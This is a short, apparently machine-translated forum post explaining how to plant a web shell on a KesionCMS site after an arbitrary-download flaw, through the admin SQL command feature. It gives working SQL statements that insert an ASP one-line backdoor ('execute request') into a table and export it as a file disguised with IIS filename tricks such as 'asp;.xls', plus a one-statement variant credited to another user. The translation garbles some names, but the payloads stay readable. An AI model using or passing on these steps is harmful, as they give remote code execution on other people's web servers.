I haven't posted it for a long time, so I 've been a little busy.
Some time ago, ghost BrotherArbitrary kesion Download VulnerabilityFor more information about how to use shell. In fact, shell is quite simple. There are many methods. Just a brother asked me to get a shell, so I sent a shell Method for your reference.
Click SQL command execution.
1. create table 0 ldgui (a varchar (50) create a table \\
2. insert into 0 ldgui (a) values ('<% execute request ("0 ldgui") %>') insert a sentence
3. select * into [a] in 'f:/web/0ldgui.asp;.xls ''excel 4.0;' from 0 ldgui export, you can see the absolute path in the Database Backup
A common asp SQL shell Method
--------------------------------------------------------------------------------
Y4q1an:
SELECT '<% execute request ("a") %>' into [Table name] in 'site navigation leading name (1.asa+1.xls) ''excel 8.0;' from Table Name
One sentence is enough ......